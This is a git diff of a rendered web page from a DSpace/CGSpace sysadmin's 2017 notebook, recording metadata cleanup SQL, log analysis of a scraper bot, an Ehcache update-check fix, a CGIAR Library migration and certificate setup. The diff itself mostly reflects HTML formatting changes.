<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -114,7 +114,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<ul>
<li>Delete 58 blank metadata values from the CGSpace database:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 58
</code></pre><ul>
<li>I also ran it on DSpace Test because we&rsquo;ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate</li>
@ -145,7 +145,7 @@ DELETE 58
<li>There will need to be some metadata updatesthough if I recall correctly it is only about seven recordsfor that as well, I had made some notes about it in <a href="/cgspace-notes/2017-07">2017-07</a>, but I&rsquo;ve asked for more clarification from Lili just in case</li>
<li>Looking at the DSpace logs to see if we&rsquo;ve had a change in the &ldquo;Cannot get a connection&rdquo; errors since last month when we adjusted the <code>db.maxconnections</code> parameter on CGSpace:</li>
</ul>
<pre><code># grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-09-*
<pre tabindex="0"><code># grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-09-*
dspace.log.2017-09-01:0
dspace.log.2017-09-02:0
dspace.log.2017-09-03:9
@ -174,14 +174,14 @@ dspace.log.2017-09-10:0
<li>The import process takes the same amount of time with and without the caching</li>
<li>Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):</li>
</ul>
<pre><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and &#39;tcp[32:4] = 0x47455420&#39;
</code></pre><ul>
<li>Great TCP dump guide here: <a href="https://danielmiessler.com/study/tcpdump">https://danielmiessler.com/study/tcpdump</a></li>
<li>The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation</li>
<li>I sent a message to the mailing list to see if anyone knows more about this</li>
<li>In looking at the tcpdump results I notice that there is an update check to the ehcache server on <em>every</em> iteration of the ingest loop, for example:</li>
</ul>
<pre><code>09:39:36.008956 IP 192.168.8.124.50515 &gt; 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&amp;pageID=update.properties&amp;id=2130706433&amp;os-name=Mac+OS+X&amp;jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&amp;jvm-version=1.8.0_144&amp;platform=x86_64&amp;tc-version=UNKNOWN&amp;tc-product=Ehcache+Core+1.7.2&amp;source=Ehcache+Core&amp;uptime-secs=0&amp;patch=UNKNOWN HTTP/1.1
<pre tabindex="0"><code>09:39:36.008956 IP 192.168.8.124.50515 &gt; 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&amp;pageID=update.properties&amp;id=2130706433&amp;os-name=Mac+OS+X&amp;jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&amp;jvm-version=1.8.0_144&amp;platform=x86_64&amp;tc-version=UNKNOWN&amp;tc-product=Ehcache+Core+1.7.2&amp;source=Ehcache+Core&amp;uptime-secs=0&amp;patch=UNKNOWN HTTP/1.1
</code></pre><ul>
<li>Turns out this is a known issue and Ehcache has refused to make it opt-in: <a href="https://jira.terracotta.org/jira/browse/EHC-461">https://jira.terracotta.org/jira/browse/EHC-461</a></li>
<li>But we can disable it by adding an <code>updateCheck=&quot;false&quot;</code> attribute to the main <code>&lt;ehcache &gt;</code> tag in <code>dspace-services/src/main/resources/caching/ehcache-config.xml</code></li>
@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
<li>I wonder what was going on, and looking into the nginx logs I think maybe it&rsquo;s OAI&hellip;</li>
<li>Here is yesterday&rsquo;s top ten IP addresses making requests to <code>/oai</code>:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
1 213.136.89.78
1 66.249.66.90
1 66.249.66.92
@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
</code></pre><ul>
<li>Compared to the previous day&rsquo;s logs it looks VERY high:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
1 207.46.13.39
1 66.249.66.93
2 66.249.66.91
@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
</li>
<li>And this user agent has never been seen before today (or at least recently!):</li>
</ul>
<pre><code># grep -c &quot;API scraper&quot; /var/log/nginx/oai.log
<pre tabindex="0"><code># grep -c &#34;API scraper&#34; /var/log/nginx/oai.log
62088
# zgrep -c &quot;API scraper&quot; /var/log/nginx/oai.log.*.gz
# zgrep -c &#34;API scraper&#34; /var/log/nginx/oai.log.*.gz
/var/log/nginx/oai.log.10.gz:0
/var/log/nginx/oai.log.11.gz:0
/var/log/nginx/oai.log.12.gz:0
@ -270,19 +270,19 @@ dspace.log.2017-09-10:0
<li>Some of these heavy users are also using XMLUI, and their user agent isn&rsquo;t matched by the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/tomcat/server-tomcat7.xml.j2#L158">Tomcat Session Crawler valve</a>, so each request uses a different session</li>
<li>Yesterday alone the IP addresses using the <code>API scraper</code> user agent were responsible for 16,000 sessions in XMLUI:</li>
</ul>
<pre><code># grep -a -E &quot;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&quot; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -a -E &#34;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&#34; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
15924
</code></pre><ul>
<li>If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex</li>
<li>A search for &ldquo;API scraper&rdquo; user agent on Google returns a <code>robots.txt</code> with a comment that this is the Yewno bot: <a href="http://www.escholarship.org/robots.txt">http://www.escholarship.org/robots.txt</a></li>
<li>Also, in looking at the DSpace logs I noticed a warning from OAI that I should look into:</li>
</ul>
<pre><code>WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
<li>Looking at the spreadsheet with deletions and corrections that CCAFS sent last week</li>
<li>It appears they want to delete a lot of metadata, which I&rsquo;m not sure they realize the implications of:</li>
</ul>
<pre><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;) group by text_value;
text_value | count
--------------------------+-------
FP4_ClimateModels | 6
@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
<li>I sent CCAFS people an email to ask if they really want to remove these 200+ tags</li>
<li>She responded yes, so I&rsquo;ll at least need to do these deletes in PostgreSQL:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
DELETE 207
</code></pre><ul>
<li>When we discussed this in late July there were some other renames they had requested, but I don&rsquo;t see them in the current spreadsheet so I will have to follow that up</li>
<li>I talked to Macaroni Bros and they said to just go ahead with the other corrections as well as their spreadsheet was evolved organically rather than systematically!</li>
<li>The final list of corrections and deletes should therefore be:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
</code></pre><ul>
<li>Create and merge pull request to shut up the Ehcache update check (<a href="https://github.com/ilri/DSpace/pull/337">#337</a>)</li>
<li>Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): <a href="https://jira.duraspace.org/browse/DS-1492">https://jira.duraspace.org/browse/DS-1492</a></li>
@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<li>Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database</li>
<li>Here are all my distinct authority combinations in the database before:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>And then after adding a new item and selecting an existing &ldquo;Orth, Alan&rdquo; with an ORCID in the author lookup:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>It created a new authority&hellip; let&rsquo;s try to add another item and select the same existing author and see what happens in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>No new one&hellip; so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>Shit, it created another authority! Let&rsquo;s try it again!</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -427,7 +427,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<ul>
<li>Apply CCAFS project tag corrections on CGSpace:</li>
</ul>
<pre><code>dspace=# \i /tmp/ccafs-projects.sql
<pre tabindex="0"><code>dspace=# \i /tmp/ccafs-projects.sql
DELETE 5
UPDATE 4
UPDATE 1
@ -439,26 +439,26 @@ DELETE 207
<li>We still need to do the changes to <code>config.dct</code> and regenerate the <code>sitebndl.zip</code> to send to the Handle.net admins</li>
<li>According to this <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">dspace-tech mailing list entry from 2011</a>, we need to add the extra handle prefixes to <code>config.dct</code> like this:</li>
</ul>
<pre><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><ul>
<li>More work on the CGIAR Library migration test run locally, as I was having problem with importing the last fourteen items from the CGIAR System Management Office community</li>
<li>The problem was that we remapped the items to new collections after the initial import, so the items were using the 10947 prefix but the community and collection was using 10568</li>
<li>I ended up having to read the <a href="https://wiki.lyrasis.org/display/DSDOC5x/AIP+Backup+and+Restore#AIPBackupandRestore-ForceReplaceMode">AIP Backup and Restore</a> closely a few times and then explicitly preserve handles and ignore parents:</li>
</ul>
<pre><code>$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
</code></pre><ul>
<li>Also, this was in replace mode (-r) rather than submit mode (-s), because submit mode always generated a new handle even if I told it not to!</li>
<li>I decided to start the import process in the evening rather than waiting for the morning, and right as the first community was finished importing I started seeing <code>Timeout waiting for idle object</code> errors</li>
@ -478,7 +478,7 @@ DELETE 207
<ul>
<li>Nightly Solr indexing is working again, and it appears to be pretty quick actually:</li>
</ul>
<pre><code>2017-09-19 00:00:14,953 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
<pre tabindex="0"><code>2017-09-19 00:00:14,953 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
...
2017-09-19 00:04:18,017 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (65807 of 65808): 83753
</code></pre><ul>
@ -494,7 +494,7 @@ DELETE 207
<li>Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite</li>
<li>Force thumbnail regeneration for the CGIAR System Organization&rsquo;s Historic Archive community (2000 items):</li>
</ul>
<pre><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>I&rsquo;m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org</li>
</ul>
@ -540,7 +540,7 @@ DELETE 207
<li>Turns out he had already mapped some, but requested that I finish the rest</li>
<li>With this GREL in OpenRefine I can find items that are mapped, ie they have <code>10568/3||</code> or <code>10568/3$</code> in their <code>collection</code> field:</li>
</ul>
<pre><code>isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
<pre tabindex="0"><code>isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
</code></pre><ul>
<li>Peter also made a lot of changes to the data in the Archives collections while I was attempting to import the changes, so we were essentially competing for PostgreSQL and Solr connections</li>
<li>I ended up having to kill the import and wait until he was done</li>
@ -552,7 +552,7 @@ DELETE 207
<li>Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org</li>
<li>Peter wants me to clean up the text values for Delia Grace&rsquo;s metadata, as the authorities are all messed up again since we cleaned them up in <a href="/cgspace-notes/2016-12">2016-12</a>:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Grace, Delia | | 600
@ -563,12 +563,12 @@ DELETE 207
<li>Strangely, none of her authority entries have ORCIDs anymore&hellip;</li>
<li>I&rsquo;ll just fix the text values and forget about it for now:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 610
</code></pre><ul>
<li>After this we have to reindex the Discovery and Authority cores (as <code>tomcat7</code> user):</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 83m56.895s
@ -603,7 +603,7 @@ sys 0m12.113s
<li>The <code>index-authority</code> script always seems to fail, I think it&rsquo;s the same old bug</li>
<li>Something interesting for my notes about JNDI database pool—since I couldn&rsquo;t determine if it was working or not when I tried it locally the other day—is this error message that I just saw in the DSpace logs today:</li>
</ul>
<pre><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
...
INFO org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspaceLocal
INFO org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
@ -627,13 +627,13 @@ INFO org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Da
<li>Now the redirects work</li>
<li>I quickly registered a Let&rsquo;s Encrypt certificate for the domain:</li>
</ul>
<pre><code># systemctl stop nginx
<pre tabindex="0"><code># systemctl stop nginx
# /opt/certbot-auto certonly --standalone --email aorth@mjanja.ch -d library.cgiar.org
# systemctl start nginx
</code></pre><ul>
<li>I modified the nginx configuration of the ansible playbooks to use this new certificate and now the certificate is enabled and OCSP stapling is working:</li>
</ul>
<pre><code>$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org -tls1_2 -tlsextdebug -status
<pre tabindex="0"><code>$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP Response Data:
...
@ -659,15 +659,15 @@ Cert Status: good
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -115,7 +115,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<p class="blog-post-meta">
<time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -124,7 +124,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<ul>
<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
</ul>
<pre><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
</code></pre><ul>
<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
@ -134,13 +134,13 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Peter Ballantyne said he was having problems logging into CGSpace with &ldquo;both&rdquo; of his accounts (CGIAR LDAP and personal, apparently)</li>
<li>I looked in the logs and saw some LDAP lookup failures due to timeout but also strangely a &ldquo;no DN found&rdquo; error:</li>
</ul>
